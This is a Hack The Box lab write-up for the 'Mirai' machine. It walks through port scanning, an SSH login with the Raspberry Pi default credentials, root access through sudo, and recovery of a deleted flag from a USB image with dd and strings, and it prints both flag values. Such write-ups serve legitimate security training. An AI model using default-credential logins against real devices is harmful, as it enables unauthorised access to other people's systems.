<- HTB

Mirai


5 minutes to read

Mirai
Hack The Box. Linux. Easy machine. This machine is a Raspberry Pi device that is configured with default credentials, so we can access through SSH and become root because we belong to group sudo. To get the root.txt flag, we need to do a raw copy of a USB stick
  • OS: Linux
  • Difficulty: Easy
  • IP Address: 10.10.10.48
  • Release: 02 / 09 / 2017

Port scanning

# Nmap 7.92 scan initiated as: nmap -sC -sV -o nmap/targeted 10.10.10.48 -p 22,53,80,1700,32400,32469  
Nmap scan report for 10.10.10.48
Host is up (0.067s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
|   1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
|   2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
|   256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_  256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp    open  domain  dnsmasq 2.76
| dns-nsid:
|_  bind.version: dnsmasq-2.76
80/tcp    open  http    lighttpd 1.4.35
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: lighttpd/1.4.35
1700/tcp  open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
32400/tcp open  http    Plex Media Server httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Server returned status 401 but no WWW-Authenticate header.
|_http-favicon: Plex
|_http-cors: HEAD GET POST PUT DELETE OPTIONS
|_http-title: Unauthorized
32469/tcp open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done -- 1 IP address (1 host up) scanned in 21.09 seconds

This machine has ports 22 (SSH), 80 (HTTP), 1700, 32400 and 32469 open.

System enumeration

If we connect to port 80 using curl, we will see some weird HTTP response headers:

$ curl -i 10.10.10.48
HTTP/1.1 404 Not Found
X-Pi-hole: A black hole for Internet advertisements.  
Content-type: text/html; charset=UTF-8
Content-Length: 0
Date: Fri, 15 Jul 2022 11:47:54 GMT
Server: lighttpd/1.4.35

Pi-hole is a service to block given IP addresses and domains that is meant to be run in a Raspberry Pi.

The name of the machine (Mirai) refers to a cyber attack that consisted in a botnet that comprimised DNS servers using a DDoS attack. The botnet was formed with IoT devices, IP cameras, and other devices that had open ports with default credentials.

Foothold on the machine

Given that the machine is likely to be a Raspberry Pi device, we can try to connect via SSH with default credentials (username: pi, password: raspberry):

$ ssh pi@10.10.10.48
pi@raspberrypi:~ $ find / -name user.txt 2>/dev/null
/home/pi/Desktop/user.txt
/lib/live/mount/persistence/sda2/home/pi/Desktop/user.txt  
pi@raspberrypi:~ $ cat /home/pi/Desktop/user.txt
ff837707441b257a20e32199d7c8838d

And we are in.

Privilege escalation

Let’s do a basic enumeration:

pi@raspberrypi:~ $ id
uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),101(input),108(netdev),117(i2c),998(gpio),999(spi)

We belong to group sudo, so we can spawn a shell as root:

pi@raspberrypi:~ $ sudo su
root@raspberrypi:/home/pi# cd
root@raspberrypi:~# cat root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...

But where’s the root.txt flag? Let’s go to the USB stick:

root@raspberrypi:~# ls -la /
total 72
drwxr-xr-x  35 root root  4096 Aug 14  2017 .
drwxr-xr-x  35 root root  4096 Aug 14  2017 ..
drwxr-xr-x   2 root root  4096 Aug 13  2017 bin
drwxr-xr-x   2 root root  4096 Aug 13  2017 boot
drwxr-xr-x  17 root root  3280 Jul 15 11:42 dev
drwxr-xr-x 170 root root  4096 Dec 24  2017 etc
drwxr-xr-x   4 root root  4096 Aug 13  2017 home
lrwxrwxrwx   1 root root    33 Dec 13  2016 initrd.img -> /boot/initrd.img-3.16.0-4-686-pae  
lrwxrwxrwx   1 root root    29 Dec 13  2016 initrd.img.old -> /boot/initrd.img-3.16.0-4-586
drwxr-xr-x  28 root root  4096 Aug 13  2017 lib
drwx------   2 root root 16384 Aug 13  2017 lost+found
drwxr-xr-x   3 root root  4096 Aug 14  2017 media
drwxr-xr-x   2 root root     3 Nov  2  2016 mnt
drwxr-xr-x   6 root root  4096 Aug 13  2017 opt
-rw-r--r--   1 root root     8 Aug 13  2017 persistence.conf
dr-xr-xr-x 127 root root     0 Jul 15 11:41 proc
drwx------   3 root root  4096 Aug 27  2017 root
drwxr-xr-x  24 root root   820 Jul 15 11:56 run
drwxr-xr-x   2 root root  4096 Dec 24  2017 sbin
drwxr-xr-x   2 root root     3 Nov  2  2016 srv
dr-xr-xr-x  13 root root     0 Jul 15 11:41 sys
drwxrwxrwt  13 root root   320 Jul 15 11:43 tmp
drwxr-xr-x  19 root root  4096 Aug 13  2017 usr
drwxr-xr-x  17 root root  4096 Aug 13  2017 var
lrwxrwxrwx   1 root root    29 Dec 13  2016 vmlinuz -> boot/vmlinuz-3.16.0-4-686-pae
lrwxrwxrwx   1 root root    25 Dec 13  2016 vmlinuz.old -> boot/vmlinuz-3.16.0-4-586
root@raspberrypi:~# ls -la /media
total 9
drwxr-xr-x  3 root root 4096 Aug 14  2017 .
drwxr-xr-x 35 root root 4096 Aug 14  2017 ..
drwxr-xr-x  3 root root 1024 Aug 14  2017 usbstick
root@raspberrypi:~# ls -la /media/usbstick/
total 18
drwxr-xr-x 3 root root  1024 Aug 14  2017 .
drwxr-xr-x 3 root root  4096 Aug 14  2017 ..
-rw-r--r-- 1 root root   129 Aug 14  2017 damnit.txt
drwx------ 2 root root 12288 Aug 14  2017 lost+found
root@raspberrypi:~# cat /media/usbstick/damnit.txt
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?

-James

It has been deleted. Let’s see if we can find it. These are all volumes mounted in the file system:

root@raspberrypi:~# df
Filesystem     1K-blocks    Used Available Use% Mounted on
aufs             8856504 2832136   5551436  34% /
tmpfs             102396    4868     97528   5% /run
/dev/sda1        1354528 1354528         0 100% /lib/live/mount/persistence/sda1
/dev/loop0       1267456 1267456         0 100% /lib/live/mount/rootfs/filesystem.squashfs  
tmpfs             255988       0    255988   0% /lib/live/mount/overlay
/dev/sda2        8856504 2832136   5551436  34% /lib/live/mount/persistence/sda2
devtmpfs           10240       0     10240   0% /dev
tmpfs             255988       8    255980   1% /dev/shm
tmpfs               5120       4      5116   1% /run/lock
tmpfs             255988       0    255988   0% /sys/fs/cgroup
tmpfs             255988       8    255980   1% /tmp
/dev/sdb            8887      93      8078   2% /media/usbstick
tmpfs              51200       0     51200   0% /run/user/999
tmpfs              51200       0     51200   0% /run/user/1000

Let’s do a raw copy of the /dev/sdb device (the USB stick) using dd (forensics methodology):

root@raspberrypi:~# dd if=/dev/sdb of=/tmp/sdb.dd
20480+0 records in
20480+0 records out
10485760 bytes (10 MB) copied, 0.0873187 s, 120 MB/s

Now we can read all printable contents using strings (even deleted files):

root@raspberrypi:~# strings /tmp/sdb.dd
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
/media/usbstick
2]8^
lost+found
root.txt
damnit.txt
>r &
3d3e483143ff12ec505d026fa13e020b
Damnit! Sorry man I accidentally deleted your files off the USB stick.  
Do you know if there is any way to get them back?
-James

And there we have the root.txt flag.